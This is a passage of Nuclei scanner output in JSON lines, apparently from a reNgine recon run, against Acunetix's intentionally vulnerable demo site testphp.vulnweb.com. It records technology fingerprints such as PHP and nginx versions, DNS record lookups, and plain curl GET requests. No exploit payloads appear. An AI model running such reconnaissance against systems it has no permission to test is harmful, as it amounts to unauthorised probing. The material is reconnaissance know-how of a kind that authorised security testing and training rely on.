align=\\\"left\\\"\\u003e\\n\\t\\t\\u003ca href=\\\"index.php\\\"\\u003ehome\\u003c/a\\u003e | \\u003ca href=\\\"categories.php\\\"\\u003ecategories\\u003c/a\\u003e | \\u003ca href=\\\"artists.php\\\"\\u003eartists\\n\\t\\t\\u003c/a\\u003e | \\u003ca href=\\\"disclaimer.php\\\"\\u003edisclaimer\\u003c/a\\u003e | \\u003ca href=\\\"cart.php\\\"\\u003eyour cart\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"guestbook.php\\\"\\u003eguestbook\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\n\\t\\u003c/td\\u003e\\n\\t\\u003ctd align=\\\"right\\\"\\u003e\\n\\t\\t\\u003c/td\\u003e\\n\\t\\u003c/tr\\u003e\\u003c/table\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\u003c!-- end masthead --\\u003e \\n\\n\\u003c!-- begin content --\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"content_rgn\\\" --\\u003e\\n\\u003cdiv id=\\\"content\\\"\\u003e\\n\\t\\u003ch2 id=\\\"pageName\\\"\\u003ewelcome to our page\\u003c/h2\\u003e\\n\\t \\u003cdiv class=\\\"story\\\"\\u003e\\n\\t\\t\\u003ch3\\u003eTest site for Acunetix WVS.\\u003c/h3\\u003e\\n\\t \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003c!--end content --\\u003e\\n\\n\\u003cdiv id=\\\"navBar\\\"\\u003e \\n \\u003cdiv id=\\\"search\\\"\\u003e \\n \\u003cform action=\\\"search.php?test=query\\\" method=\\\"post\\\"\\u003e \\n \\u003clabel\\u003esearch art\\u003c/label\\u003e \\n \\u003cinput name=\\\"searchFor\\\" type=\\\"text\\\" size=\\\"10\\\"\\u003e \\n \\u003cinput name=\\\"goButton\\\" type=\\\"submit\\\" value=\\\"go\\\"\\u003e \\n \\u003c/form\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"sectionLinks\\\"\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"categories.php\\\"\\u003eBrowse categories\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"artists.php\\\"\\u003eBrowse artists\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"cart.php\\\"\\u003eYour cart\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"login.php\\\"\\u003eSignup\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"userinfo.php\\\"\\u003eYour profile\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"guestbook.php\\\"\\u003eOur guestbook\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\u003cli\\u003e\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv class=\\\"relatedLinks\\\"\\u003e \\n \\u003ch3\\u003eLinks\\u003c/h3\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eSecurity art\\u003c/a\\u003e\\u003c/li\\u003e \\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\\\"\\u003ePHP scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\\\"\\u003ePHP vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"http://www.eclectasy.com/Fractal-Explorer/index.html\\\"\\u003eFractal Explorer\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"advert\\\"\\u003e \\n \\u003cp\\u003e\\n \\u003cobject classid=\\\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\\\" codebase=\\\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\n \\u003cparam name=\\\"movie\\\" value=\\\"Flash/add.swf\\\"\\u003e\\n \\u003cparam name=quality value=high\\u003e\\n \\u003cembed src=\\\"Flash/add.swf\\\" quality=high pluginspage=\\\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\\\" type=\\\"application/x-shockwave-flash\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\u003c/embed\\u003e\\n \\u003c/object\\u003e\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\n\\u003c!--end navbar --\\u003e \\n\\u003cdiv id=\\\"siteInfo\\\"\\u003e \\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eAbout Us\\u003c/a\\u003e | \\u003ca href=\\\"privacy.php\\\"\\u003ePrivacy Policy\\u003c/a\\u003e | \\u003ca href=\\\"mailto:wvs@acunetix.com\\\"\\u003eContact Us\\u003c/a\\u003e | \\u003ca href=\\\"/Mod_Rewrite_Shop/\\\"\\u003eShop\\u003c/a\\u003e | \\u003ca href=\\\"/hpp/\\\"\\u003eHTTP Parameter Pollution\\u003c/a\\u003e | \\u0026copy;2019\\n Acunetix Ltd \\n\\u003c/div\\u003e \\n \\n \\n\\u003cbr\\u003e \\n\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c/body\\u003e\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:49.610745173Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0' 'http://testphp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"php\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop\",\"path\":\"/Mod_Rewrite_Shop\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/\",\"request\":\"GET /Mod_Rewrite_Shop HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:31.0) Gecko/20100101 Firefox/31.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:47 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n\\t\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/1.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003eNetwork Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003ePrice\\u003cbr\\u003e359 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/2.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003eWeb Camera A4Tech PK-335E\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003ePrice\\u003cbr\\u003e10 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/3.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/color-printer/3/'\\u003eLaser Color Printer HP LaserJet M551dn, A4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/color-printer/3/'\\u003ePrice\\u003cbr\\u003e812 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003c/div\\u003e\\r\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:49.775148168Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:31.0) Gecko/20100101 Firefox/31.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 41049\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 41049\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86393\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:50.2039905Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 50884\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 50884\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1791\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:50.207425898Z\",\"matcher-status\":true}\n{\"template\":\"dns/nameserver-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nameserver-fingerprint\",\"template-id\":\"nameserver-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/nameserver-fingerprint.yaml\",\"info\":{\"name\":\"NS Record Detection\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"ns\"],\"description\":\"An NS record was detected. An NS record delegates a subdomain to a set of name servers.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"vulnweb.com\",\"matched-at\":\"vulnweb.com\",\"extracted-results\":[\"ns2.eurodns.com.\",\"ns3.eurodns.com.\",\"ns1.eurodns.com.\",\"ns4.eurodns.com.\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 15880\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;vulnweb.com.\\tIN\\t NS\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 15880\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;vulnweb.com.\\tIN\\t NS\\n\\n;; ANSWER SECTION:\\nvulnweb.com.\\t21600\\tIN\\tNS\\tns3.eurodns.com.\\nvulnweb.com.\\t21600\\tIN\\tNS\\tns1.eurodns.com.\\nvulnweb.com.\\t21600\\tIN\\tNS\\tns4.eurodns.com.\\nvulnweb.com.\\t21600\\tIN\\tNS\\tns2.eurodns.com.\\n\",\"timestamp\":\"2024-11-13T02:34:50.228522346Z\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:50 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:50.59518849Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1'\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 55511\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 55511\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1790\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:51.179375642Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 37304\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 37304\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1797\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:51.180938955Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"vulnweb.com\",\"matched-at\":\"vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 35249\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 35249\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86400\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:51.18811137Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"www.vulnweb.com\",\"matched-at\":\"www.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 53372\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;www.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 53372\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;www.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86400\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:51.18960587Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"vulnweb.com\",\"matched-at\":\"vulnweb.com\",\"extracted-results\":[\"\\\"v=spf1 -all\\\"\",\"\\\"google-site-verification=4LQORV-lTi-d4GPxtBEQWmFnwff7UAazQc9gZvHukbw\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 42471\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 42471\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\nvulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\nvulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification=4LQORV-lTi-d4GPxtBEQWmFnwff7UAazQc9gZvHukbw\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:51.381729462Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"www.vulnweb.com\",\"matched-at\":\"www.vulnweb.com\",\"extracted-results\":[\"\\\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 33315\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;www.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 33315\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION 